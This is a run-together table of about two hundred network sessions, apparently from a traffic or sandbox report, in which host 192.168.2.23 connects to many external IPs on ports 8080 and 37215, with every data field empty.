                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4176192.168.2.235068257.185.10.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4177192.168.2.2341832163.93.59.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4178192.168.2.2359558122.233.67.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4179192.168.2.233650847.187.29.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4180192.168.2.235252219.46.30.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4181192.168.2.233969624.2.139.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4182192.168.2.23350741.188.4.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4183192.168.2.2349306140.92.188.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4184192.168.2.233737860.191.37.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4185192.168.2.2344022120.198.232.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4186192.168.2.234565414.37.240.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4187192.168.2.2348140197.21.94.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4188192.168.2.234911841.249.117.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4189192.168.2.2332878172.226.120.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4190192.168.2.2333184133.143.36.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4191192.168.2.235103041.118.147.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4192192.168.2.2358712197.97.59.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4193192.168.2.2335392157.102.127.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4194192.168.2.233969623.25.205.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4195192.168.2.2346156164.178.28.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4196192.168.2.234155241.82.64.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4197192.168.2.2349400157.196.40.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4198192.168.2.233727641.88.154.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4199192.168.2.234306841.242.98.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4200192.168.2.234793250.191.141.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4201192.168.2.2342824197.235.37.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4202192.168.2.23513908.177.189.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4203192.168.2.2354626178.66.97.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4204192.168.2.2353620157.182.171.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4205192.168.2.2351096157.197.201.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4206192.168.2.234786441.129.195.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4207192.168.2.2344324157.12.165.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4208192.168.2.2356814197.174.64.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4209192.168.2.233322841.206.84.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4210192.168.2.2351022157.238.156.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4211192.168.2.2344090157.170.203.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4212192.168.2.2351228141.213.245.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4213192.168.2.2348596157.103.66.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4214192.168.2.2354464157.198.179.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4215192.168.2.2348500197.185.42.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4216192.168.2.234255241.62.152.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4217192.168.2.2358442197.220.187.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4218192.168.2.2348794157.53.249.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4219192.168.2.2333336197.118.27.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4220192.168.2.234978441.192.231.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4221192.168.2.2351996168.168.203.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4222192.168.2.233347441.125.195.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4223192.168.2.2340546107.220.175.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4224192.168.2.2336558157.250.230.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4225192.168.2.2335868197.190.169.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4226192.168.2.234862841.50.92.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4227192.168.2.2353228157.152.127.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4228192.168.2.2343494197.31.25.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4229192.168.2.234265239.231.203.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4230192.168.2.2355760179.151.106.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4231192.168.2.2347212157.14.160.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4232192.168.2.2340900157.221.82.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4233192.168.2.234808441.147.145.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4234192.168.2.235491241.169.255.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4235192.168.2.2340068197.49.39.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4236192.168.2.233577441.81.199.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4237192.168.2.2347054107.22.13.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4238192.168.2.2358550157.98.6.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4239192.168.2.2354766157.123.186.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4240192.168.2.234879285.114.70.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4241192.168.2.2346474205.238.45.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4242192.168.2.234567641.242.208.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4243192.168.2.2334408197.187.92.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4244192.168.2.2342264176.206.195.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4245192.168.2.2337060221.114.12.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4246192.168.2.2342692157.83.31.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4247192.168.2.2354692128.137.186.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4248192.168.2.2349072157.213.189.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4249192.168.2.234169841.50.247.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4250192.168.2.233680876.195.214.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4251192.168.2.2342838157.131.28.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4252192.168.2.2355716191.59.127.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4253192.168.2.234496441.134.190.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4254192.168.2.233985871.212.97.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4255192.168.2.2339018197.240.115.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4256192.168.2.2333532108.130.130.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4257192.168.2.233472817.198.8.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4258192.168.2.235801241.199.4.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4259192.168.2.233499641.12.211.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4260192.168.2.234051841.76.132.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4261192.168.2.2348982157.136.49.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4262192.168.2.2350198197.15.21.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4263192.168.2.2357936157.83.196.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4264192.168.2.2353916157.131.114.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4265192.168.2.235447841.86.119.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4266192.168.2.2345434208.187.59.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4267192.168.2.233385241.86.58.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4268192.168.2.235338865.90.146.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4269192.168.2.235165241.245.14.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4270192.168.2.23491908.200.196.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4271192.168.2.2333316157.123.70.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4272192.168.2.2338516157.166.39.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4273192.168.2.2340904197.190.182.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4274192.168.2.23481904.240.72.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4275192.168.2.235623079.3.118.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4276192.168.2.233604841.217.108.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4277192.168.2.2359546166.138.228.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4278192.168.2.2345964197.140.206.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4279192.168.2.2334086157.128.188.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4280192.168.2.234361693.130.125.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4281192.168.2.2350246157.10.123.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4282192.168.2.2345146157.169.63.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4283192.168.2.2341680197.86.78.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4284192.168.2.2359170157.7.83.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4285192.168.2.2352948157.213.122.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4286192.168.2.234988041.248.122.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4287192.168.2.234118841.128.196.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4288192.168.2.2343876223.38.187.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4289192.168.2.234924038.226.110.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4290192.168.2.2346538157.253.212.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4291192.168.2.2341434197.30.33.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4292192.168.2.235295671.219.175.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4293192.168.2.2358528197.27.13.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4294192.168.2.2360816176.5.159.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4295192.168.2.2348788145.204.148.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4296192.168.2.2347384152.57.47.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4297192.168.2.235099682.68.210.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4298192.168.2.2334090204.5.63.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4299192.168.2.2344136114.41.179.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4300192.168.2.235684899.59.78.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4301192.168.2.2356036163.148.39.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4302192.168.2.235043093.89.139.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4303192.168.2.2354382106.112.202.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4304192.168.2.2351404174.17.28.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4305192.168.2.2360194172.79.188.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4306192.168.2.2353352108.175.7.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4307192.168.2.233824098.243.10.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4308192.168.2.235173449.92.12.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4309192.168.2.234641241.108.151.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4310192.168.2.2357330208.43.254.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4311192.168.2.2346410203.45.230.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4312192.168.2.2357080223.100.39.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4313192.168.2.2334264221.25.89.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4314192.168.2.234123060.123.101.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4315192.168.2.2354594155.147.35.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4316192.168.2.2350116154.200.162.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4317192.168.2.2349020142.247.53.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4318192.168.2.233953093.12.204.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4319192.168.2.2356026198.172.100.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4320192.168.2.2336670202.32.54.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4321192.168.2.234663646.70.98.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4322192.168.2.2351618107.221.245.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4323192.168.2.234591053.41.145.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4324192.168.2.2342532102.92.239.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4325192.168.2.2350598122.196.164.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4326192.168.2.2351110218.24.251.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4327192.168.2.2341546176.137.252.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4328192.168.2.2349698121.55.196.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4329192.168.2.2349836168.215.210.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4330192.168.2.234440460.208.218.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4331192.168.2.235071698.239.152.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4332192.168.2.234562269.177.36.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4333192.168.2.2340068146.128.172.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4334192.168.2.2350672102.103.51.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4335192.168.2.235093817.136.218.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4336192.168.2.233985023.58.252.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4337192.168.2.2350370204.156.106.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4338192.168.2.2351010141.253.190.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4339192.168.2.2348778131.58.168.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4340192.168.2.2350206116.129.60.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4341192.168.2.234049823.63.83.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4342192.168.2.2333430187.119.132.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4343192.168.2.234824849.246.69.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4344192.168.2.2345986148.178.250.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4345192.168.2.234465627.207.167.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4346192.168.2.2348240186.38.88.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4347192.168.2.2354024128.75.2.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4348192.168.2.234888627.226.5.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4349192.168.2.2357908217.113.31.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4350192.168.2.233853850.238.52.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4351192.168.2.2339392147.184.35.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4352192.168.2.234332271.180.178.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4353192.168.2.234779088.235.66.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4354192.168.2.2351066174.188.134.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4355192.168.2.234824672.23.58.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4356192.168.2.2346982178.228.224.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4357192.168.2.2333018117.155.252.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4358192.168.2.2353738126.9.36.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4359192.168.2.2350672139.42.186.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4360192.168.2.2357950168.219.187.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4361192.168.2.2342582103.196.40.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4362192.168.2.2355562168.156.75.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4363192.168.2.234128678.146.74.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4364192.168.2.234834293.118.163.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4365192.168.2.2334660163.233.97.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4366192.168.2.235806865.235.51.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4367192.168.2.2348458221.153.30.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4368192.168.2.233491414.242.48.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4369192.168.2.2340530176.230.168.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4370192.168.2.2339532149.252.131.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4371192.168.2.2335530170.114.245.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4372192.168.2.2346990198.136.154.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4373192.168.2.2350974173.147.116.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4374192.168.2.234979650.35.230.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4375192.168.2.2350554172.109.173.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4376192.168.2.2348418175.20.53.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4377192.168.2.2354526217.88.132.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4378192.168.2.23375748.204.1.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4379192.168.2.234571278.163.9.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4380192.168.2.233390251.143.85.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4381192.168.2.2332824201.24.17.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4382192.168.2.2340912212.251.11.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4383192.168.2.2341578124.222.210.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4384192.168.2.235951470.76.221.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4385192.168.2.234347418.228.148.1588080
